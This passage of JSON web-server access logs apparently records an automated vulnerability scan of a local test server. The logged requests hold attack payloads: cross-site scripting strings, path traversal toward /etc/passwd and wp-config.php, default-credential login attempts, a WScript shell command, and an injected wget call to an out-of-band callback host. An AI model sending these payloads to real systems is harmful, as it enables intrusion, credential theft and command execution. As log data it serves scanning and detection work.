(Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /product-downloads/29N5EkTUMOrMYVMhu0mHDyeClnJ.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/29N5EhsDKWHrXRyWZrKCFOKAGye HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fca2tuc8smpv1g2s80ca0fd61gncwztg97.oast.pro%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/29N5ElydDTWGD8XuQ8o1QDWNTtP/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"test_data","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"{\x22id\x22: 1, \x22method\x22: \x22global.login\x22, \x22params\x22: {\x22authorityType\x22: \x22Default\x22, \x22clientType\x22: \x22NetKeyboard\x22, \x22loginType\x22: \x22Direct\x22, \x22password\x22: \x22Not Used\x22, \x22passwordType\x22: \x22Default\x22, \x22userName\x22: \x22admin\x22}, \x22session\x22: 0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"action=tie_ajax_search&query[]=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robots.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git-credentials HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\x22cmd /c whoami\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /meta HTTP/1.1","status":"405","body_bytes_sents":"584","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /t/index.php?action[]=aaaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 